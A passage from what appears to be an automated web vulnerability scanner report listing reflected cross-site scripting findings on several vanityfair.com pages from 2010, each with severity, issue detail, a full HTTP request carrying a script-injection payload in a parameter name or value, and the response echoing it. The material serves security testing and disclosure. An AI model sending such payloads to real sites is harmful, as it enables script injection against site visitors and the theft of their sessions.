Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=299
Expires: Mon, 29 Nov 2010 16:53:04 GMT
Date: Mon, 29 Nov 2010 16:48:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80046


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<title>A0ae3</title><script>alert(1)</script>20e1459f959 | Search | Vanity Fair</title>
...[SNIP]...

1.261. http://www.vanityfair.com/services/privacypolicy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /services/privacypolicy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7dd3"><script>alert(1)</script>c58bfc76fab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/privacypolicy?e7dd3"><script>alert(1)</script>c58bfc76fab=1 HTTP/1.1
Host: www.vanityfair.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 29 Nov 2010 16:32:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 29 Nov 2010 16:32:15 GMT
Connection: close
Set-Cookie: JSESSIONID=dba2-mKw-ybYI5IFJEyYs.4; domain=.vanityfair.com; path=/
Set-Cookie: mobify=0; expires=Mon, 29-Nov-2010 18:32:15 GMT; domain=vanityfair.com
Content-Length: 91026


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/services/privacypolicy?printable=true&e7dd3"><script>alert(1)</script>c58bfc76fab=1" title="Print this page">
...[SNIP]...

1.262. http://www.vanityfair.com/services/privacypolicy [printable parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /services/privacypolicy

Issue detail

The value of the printable request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f466d"><script>alert(1)</script>d9307ac5c56 was submitted in the printable parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/privacypolicy?printable=truef466d"><script>alert(1)</script>d9307ac5c56 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Mon, 29 Nov 2010 16:47:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 29 Nov 2010 16:47:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61390


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/services/privacypolicy?printable=true&printable=truef466d"><script>alert(1)</script>d9307ac5c56" title="Print this page">
...[SNIP]...

1.263. http://www.vanityfair.com/services/rss/summary [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /services/rss/summary

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 520a1"><script>alert(1)</script>d5a49097412 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/rss/summary?520a1"><script>alert(1)</script>d5a49097412=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:57:13 GMT
Date: Mon, 29 Nov 2010 16:47:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 90008


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/services/rss/summary?printable=true&520a1"><script>alert(1)</script>d5a49097412=1" title="Print this page">
...[SNIP]...

1.264. http://www.vanityfair.com/services/useragreement [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /services/useragreement

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8757"><script>alert(1)</script>998cc1d5678 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/useragreement?f8757"><script>alert(1)</script>998cc1d5678=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Mon, 29 Nov 2010 16:47:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 29 Nov 2010 16:47:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110003


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/services/useragreement?printable=true&f8757"><script>alert(1)</script>998cc1d5678=1" title="Print this page">
...[SNIP]...

1.265. http://www.vanityfair.com/society/features/2010/12/prince-william-and-kate-slide-show-201012 [name of an arbitrarily supplied